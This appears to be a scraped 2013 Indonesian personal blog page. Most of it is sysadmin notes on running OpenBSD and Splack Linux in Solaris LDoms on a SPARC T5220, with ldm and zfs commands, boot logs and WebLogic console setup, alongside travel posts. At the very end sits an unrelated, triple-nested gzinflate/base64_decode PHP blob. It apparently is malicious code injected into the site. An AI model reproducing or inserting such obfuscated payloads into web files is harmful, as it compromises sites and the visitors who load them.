Your IP is: 72.44.48.122 [ IPv4 ]
Delicious

Archives

Categories

newborn race

  ozzie / 14/05/2013




#:-s #:-s akhirnya ada waktu ngedit video adventure OutBound D2M Hasil Kebon 2013

Tanakita CampSite: 1-3 Maret 2013



Oracle Enterprise Cloud Infrastucture

  ozzie / 23/04/2013

Exploring & Build Cloud & Solaris Virtualization (LDOMs & Zone).





just review: Oracle Enterprise Manager Ops Center. semua fitur; monitoring, provisioning, managing, maintaining.. hingga developing pun sudah include development plan… Migrate zone & vm.. server & storage pool..




Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c



Oracle WebLogic

  ozzie / 21/04/2013

*Just Reminder
kadang install liwat GUI configure domain via quickstart.sh #:-s


kalo mesin-mesin SOLARIS non GUI:

# {WLS_HOME}/common/bin/config.sh -mode=console

oiyah #-o..

untuk solaris 11 harus install jdk, (default nya gak ada javac)

#  pkg  install --accept pkg:/developer/java/jdk@1.7.0.7-0.175.1.0.0.24.0



splack [slackware @ SPARC]

  ozzie / 10/04/2013

install splack @ SPARC Architecture:

berhubung running di LDoms nya solaris. tinggal alokasi resource seperlunya :D

[    0.000000] PROMLIB: Sun IEEE Boot Prom 'OBP 4.33.6.b 2012/12/11 20:50'
[    0.000000] PROMLIB: Root node compatible: sun4v
[    0.000000] Linux version 2.6.23.17-gl64090105 (root@toad) (gcc version 4.2.3) #2 SMP Tue Jan 6 04:22:34 Local time zone must be set--see zic m
[    0.000000] ARCH: SUN4V
[    0.000000] Ethernet address: 00:14:4f:fb:fa:64
[    0.000000] OF stdout device is: /virtual-devices@100/console@1
[    0.000000] PROM: Built device tree with 35549 bytes of memory.
[    0.000000] MDESC: Size is 19680 bytes.
[    0.000000] PLATFORM: banner-name [SPARC Enterprise T5220]
[    0.000000] PLATFORM: name [SUNW,SPARC-Enterprise-T5220]
[    0.000000] PLATFORM: hostid [84fbfa64]
[    0.000000] PLATFORM: serial# [00ab4130]
[    0.000000] PLATFORM: stick-frequency [5458c3a0]
[    0.000000] PLATFORM: mac-address [144ffbfa64]
[    0.000000] PLATFORM: watchdog-resolution [1000 ms]
[    0.000000] PLATFORM: watchdog-max-timeout [31536000000 ms]
[    0.000000] PLATFORM: max-cpus [64]
[    0.000000] On node 0 totalpages: 1046987
[    0.000000]   Normal zone: 7278 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 1039709 pages, LIFO batch:15
[    0.000000]   Movable zone: 0 pages used for memmap
[    0.000000] Built 1 zonelists in Zone order.  Total pages: 1039709
...
...
...
 
 
Welcome to the Splack Linux installation disk! (version 12.1-pre1)
 
######  IMPORTANT!  READ THE INFORMATION BELOW CAREFULLY.  ######
 
- You will need one or more partitions of type 'Linux' prepared.  It is also
  recommended that you create a swap partition (type 'Linux swap') prior
  to installation.  For more information, run 'setup' and read the help file.
 
- If you're having problems that you think might be related to low memory (this
  is possible on machines with 64 or less megabytes of system memory), you can
  try activating a swap partition before you run setup.  After making a swap
  partition (type 82) with cfdisk or fdisk, activate it like this: 
    mkswap /dev/<partition> ; swapon /dev/<partition>
 
- Once you have prepared the disk partitions for Linux, type 'setup' to begin
  the installation process.  
 
- If you do not have a color monitor, type:  TERM=vt100
  before you start 'setup'.
 
You may now login as 'root'.
 
slackware login: 
 
Linux 2.6.23.17-gl64090105.
 
If you're upgrading an existing Slackware system, you might want to
remove old packages before you run 'setup' to install the new ones. If
you don't, your system will still work but there might be some old files
left laying around on your drive.
 
Just mount your Linux partitions under /mnt and type 'pkgtool'. If you
don't know how to mount your partitions, type 'pkgtool' and it will tell
you how it's done.
 
To partition your hard drive(s), use 'cfdisk' or 'fdisk'.
To activate PCMCIA/Cardbus devices needed for installation, type 'pcmcia'.
To start the main installation, type 'setup'.
 
root@slackware:/#



Beautiful Dangerous

  ozzie / 01/04/2013

Tanjung Lesung 

Tanjung Lesung

Tanjung Lesung 29 – 31 Maret 2013





Install OpenBSD pada LDom SOLARIS di mesin SUN Enterprise T5220

create guest at Domain Controller: dengan 8 CPU, 4GB Ram & 2 network interface sajah :p

# ldm add-domain OpenBSD
# ldm add-vcpu 8 OpenBSD
# ldm add-memory 4G OpenBSD 
# ldm add-vnet vnet1 primary-vsw0 OpenBSD
# ldm add-vnet vnet2 primary-vsw1 OpenBSD



create ZFS pool – disk

# zfs create Ldom/OpenBSD
# zfs create -V 40gb Ldom/OpenBSD/disk0
# zfs create -V 80gb Ldom/OpenBSD/disk0


# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk0  openbsd-disk0@primary-vds0
# ldm add-vdsdev /dev/zvol/rdsk/Ldom/OpenBSD/disk1  openbsd-disk1@primary-vds0
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm add-vdisk vdisk1 openbsd-disk0@primary-vds0 OpenBSD
# ldm bind sst-ldom-dev1
# ldm set-var auto-boot\?=false OpenBSD



download iso OpenBSD untuk architecture Sparc64 & attach ke domain

# wget ftp://ftp.openbsd.org/pub/OpenBSD/5.2/sparc64/install52.iso
# ldm add-vdsdev /export/home/ozzie/install52.iso iso@primary-vds0
# ldm add-vdisk cdrom iso@primary-vds0 OpenBSD



sampai sini telah membuat virtual device (cdrom) installer OpenBSD.

aktifkan guest domain & install openBSD seperti biasa..

# ldm start-domain OpenBSD
# telnet localhost 50xx
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
Connecting to console "OpenBSD" in group "OpenBSD" ....
Press ~? for control options ..
 
{0} ok 
{0} ok 
{0} ok devalias
cdrom                    /virtual-devices@100/channel-devices@200/disk@1
vdisk1                   /virtual-devices@100/channel-devices@200/disk@0
...
...
...
 
Boot device: /virtual-devices@100/channel-devices@200/disk@1:f  File and args: 
OpenBSD IEEE 1275 Bootblock 1.3
..>> OpenBSD BOOT 1.4
Trying bsd...
Booting /virtual-devices@100/channel-devices@200/disk@0:a/bsd
6605424@0x1000000+5520@0x164ca70+173400@0x1800000+4020904@0x182a558 
symbols @ 0xfedd02c0 81+405456+255993 start=0x1000000
[ using 662248 bytes of bsd ELF symbol table ]
console is /virtual-devices@100/console@1
Copyright (c) 1982, 1986, 1989, 1991, 1993
	The Regents of the University of California.  All rights reserved.
Copyright (c) 1995-2012 OpenBSD. All rights reserved.  http://www.OpenBSD.org
 
OpenBSD 5.2 (GENERIC.MP) #236: Mon Jul 30 16:38:18 MDT 2012
    deraadt@sparc64.openbsd.org:/usr/src/sys/arch/sparc64/compile/GENERIC.MP
real mem = 4294967296 (4096MB)
avail mem = 4210024448 (4014MB)
mainbus0 at root: SPARC Enterprise T5220
cpu0 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu1 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu2 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu3 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu4 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu5 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu6 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
cpu7 at mainbus0: SUNW,UltraSPARC-T2 (rev 0.0) @ 1415.103 MHz
vbus0 at mainbus0
"flashprom" at vbus0 not configured
"n2cp" at vbus0 not configured
"ncp" at vbus0 not configured
vrng0 at vbus0
vcons0 at vbus0: ivec 0x111, console
cbus0 at vbus0
vnet0 at cbus0 chan 0x0: ivec 0x200, 0x201, address 00:14:4f:f8:45:94
vnet1 at cbus0 chan 0x3: ivec 0x206, 0x207, address 00:14:4f:fa:c4:73
vdsk0 at cbus0 chan 0x6: ivec 0x20c, 0x20d
scsibus0 at vdsk0: 2 targets
sd0 at scsibus0 targ 0 lun 0: <SUN, Virtual Disk, 1.0> SCSI3 0/direct fixed
sd0: 40960MB, 512 bytes/sector, 83886080 sectors
"virtual-domain-service" at cbus0 not configured
vrtc0 at vbus0
vscsi0 at root
..
..
..
..

install seperti biasa dan bersih-bersih setelah selesai

# ldm set-var auto-boot\?=true OpenBSD
# ldm stop OpenBSD
LDom OpenBSD stopped
# ldm remove-vdisk cdrom OpenBSD 
# ldm remove-vdsdev iso@primary-vds0


Semoga bermanfaat… :p



stupid flight

  ozzie / 07/03/2013


Juanda Airport: akibat kebanyakan CC email & GM panik .. SUB-CKG



OutBound D2M Hasil Kebon 2013

  ozzie / 04/03/2013


Tanakita Campsite: 1-3 Maret 2013



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>